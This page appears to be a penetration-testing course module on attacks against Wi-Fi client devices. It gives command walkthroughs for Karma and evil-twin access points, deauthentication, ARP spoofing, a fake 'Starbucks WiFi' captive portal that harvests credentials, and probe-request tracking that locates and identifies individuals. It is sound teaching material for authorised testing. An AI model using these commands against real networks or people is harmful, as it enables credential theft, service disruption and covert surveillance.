Back to All Modules

Wireless Client Attacks

#Overview

Wireless client attacks target the client device (laptop, phone, IoT device) rather than the access point. Clients are often more vulnerable than APs because they actively seek known networks, trust probe responses, and may auto-connect to previously remembered SSIDs. These attacks don't require compromising the target AP — instead, they exploit client behavior to force connections to an attacker-controlled AP.

#Attack Categories

#1. Karma Attacks

The Karma attack exploits the 802.11 probe request/response mechanism. When a client searches for known networks, it sends probe requests (either broadcast or directed). A Karma-enabled AP responds to all probe requests, making the client believe it has found a known network.

# Passive probe request monitoring (no transmission)
sudo airodump-ng wlan0mon --write probe-requests

# Review captured probe requests for target SSIDs
tshark -r probe-requests-01.cap -Y 'wlan.fc.type_subtype == 0x0004' \
  -T fields -e wlan.sa -e wlan.ssid | sort -u

# Active Karma attack with eaphammer
sudo eaphammer --interface wlan0 \
  --essid "" \
  --channel <CH> \
  --karma \
  --captive-portal

# Karma attack with hostapd-wpe (requires karma patch)
# Responds to all directed probe requests
sudo hostapd-wpe /tmp/hostapd-karma.conf
BASH

#2. Directed Probe Request Attacks

Most clients send directed probe requests for their saved networks. Capture these to identify target SSIDs, then create an evil twin matching those SSIDs.

# Step 1: Capture probe requests
sudo airodump-ng wlan0mon --write probes

# Step 2: Extract unique SSIDs from probe requests
tshark -r probes-01.cap -Y 'wlan.fc.type_subtype == 0x0004 && wlan.ssid != ""' \
  -T fields -e wlan.sa -e wlan.ssid | sort -u

# Step 3: Create evil twin for the most common SSID
sudo eaphammer --interface wlan0 \
  --essid "<TARGET_SSID>" \
  --channel <CH> \
  --captive-portal

# Step 4: Deauth clients from legitimate AP to force reconnection
sudo aireplay-ng -0 5 -a <AP_MAC> wlan0mon
BASH

#3. Client Isolation Bypass

Many enterprise APs implement client isolation (prevent client-to-client communication). This can be bypassed:

# Check if client isolation is active
sudo airodump-ng wlan0mon --channel <CH>
# If you can see other clients but not ping them, isolation is active

# Bypass via wired side
# If you have access to the wired network, client isolation doesn't apply

# Bypass via ARP spoofing (may work on some APs)
arpspoof -i wlan0 -t <gateway_ip> <target_client_ip>

# Bypass via multicast/broadcast
# Some APs allow multicast/broadcast between isolated clients
nmap -sU -p 5353 <target_subnet>  # mDNS
BASH

#4. Wi-Fi Direct Attacks

Wi-Fi Direct (P2P) allows devices to connect without an AP. It's commonly used for printing, screen casting, and file sharing.

# Discover Wi-Fi Direct devices
sudo p2p_find
wpa_cli -i wlan0
> p2p_find
> p2p_peers

# Connect as a P2P client
> p2p_connect <peer_mac> pbc persistent

# Attack Wi-Fi Direct:
# 1. Rogue P2P GO (Group Owner) - force devices to connect to attacker
# 2. WPS PIN attack on P2P (same vulnerabilities as infrastructure WPS)
# 3. P2P invitation flooding - DoS
BASH

#5. Hotspot Credential Theft

Clients that auto-connect to open hotspots (hotel, airport, coffee shop) can be targeted by creating a matching SSID.

# Common hotspot SSIDs to mimic
# "Starbucks WiFi", "Hotel_Guest", "Airport_Free_WiFi", "attwifi", "xfinitywifi"

# Set up evil twin with common hotspot SSID
sudo eaphammer --interface wlan0 \
  --essid "Starbucks WiFi" \
  --channel 6 \
  --captive-portal

# The captive portal mimics the real hotspot's login page
# Clients auto-connect and submit credentials
BASH

#6. Probe Request Tracking for Location Correlation

Probe requests reveal a client's previously connected networks, enabling location tracking and SSID profiling.

# Continuous probe request capture
sudo airodump-ng wlan0mon --write probe-tracking --output-format pcap,csv

# Extract client MAC addresses and their preferred SSIDs
tshark -r probe-tracking-01.cap -Y 'wlan.fc.type_subtype == 0x0004' \
  -T fields -e wlan.sa -e wlan.ssid -e wlan.fc.type_subtype | \
  awk '$3 == "4" {print $1, $2}' | sort -u

# Geographic correlation
# Probe requests include signal strength, enabling physical location estimation
tshark -r probe-tracking-01.cap -Y 'wlan.fc.type_subtype == 0x0004' \
  -T fields -e wlan.sa -e wlan.ssid -e radiotap.dbm_antsignal | \
  sort -u

# De-anonymization: correlate MAC addresses with SSIDs to identify specific users
# E.g., "John's iPhone" connects to "HomeNetwork" and "OfficeWiFi"
BASH

#Passive vs Active Client Attacks

Attack TypePassiveActive
Probe request monitoringYesNo
SSID profilingYesNo
Location trackingYesNo
Karma attackNoYes
Directed probe responseNoYes
Evil twinNoYes
Deauth + force reconnectionNoYes

Rule of thumb: Start with passive monitoring (probe requests, SSID profiling). Move to active attacks only when passive methods are insufficient.

#OPSEC Considerations

  • Passive probe request monitoring is undetectable to clients — the attacker never transmits
  • Karma attacks are detectable by WIDS because the AP responds to probe requests for SSIDs it shouldn't know
  • Evil twin SSIDs are visible to anyone scanning in the area
  • Probe request tracking raises privacy concerns — ensure scope explicitly covers location tracking
  • Deauthentication to force reconnection is highly visible and logged by enterprise APs
  • Always verify scope includes client device testing before targeting end-user devices

#Cross-References

#Tool References

ToolPurposeLink
airodump-ngProbe request capturehttps://www.aircrack-ng.org/
eaphammerKarma attack + evil twinhttps://github.com/s0lst1c3/eaphammer
hostapd-wpeKarma-enabled rogue APhttps://github.com/OpenSecurityResearch/hostapd-wpe
bettercapWiFi recon and client trackinghttps://www.bettercap.org/
tsharkPacket analysishttps://www.wireshark.org/
wpa_cliWi-Fi Direct (P2P)https://w1.fi/